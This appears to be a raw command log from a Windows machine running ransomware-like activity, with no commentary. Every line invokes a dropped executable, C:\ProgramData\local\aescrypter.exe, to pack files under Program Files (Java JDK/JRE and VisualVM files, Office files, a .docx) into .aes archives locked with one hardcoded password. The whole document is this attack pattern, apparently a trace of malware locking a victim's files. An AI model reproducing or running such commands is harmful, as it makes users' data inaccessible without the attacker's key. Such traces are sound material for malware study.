"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\bin\server\Xusage.txt.aes" "C:\Program Files\Java\jre7\bin\server\Xusage.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip.aes" "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\lib\jvm.hprof.txt.aes" "C:\Program Files\Java\jre7\lib\jvm.hprof.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\README.txt.aes" "C:\Program Files\Java\jre7\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\LimitPush.docx.aes" "C:\Program Files\LimitPush.docx" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.aes" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt.aes" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

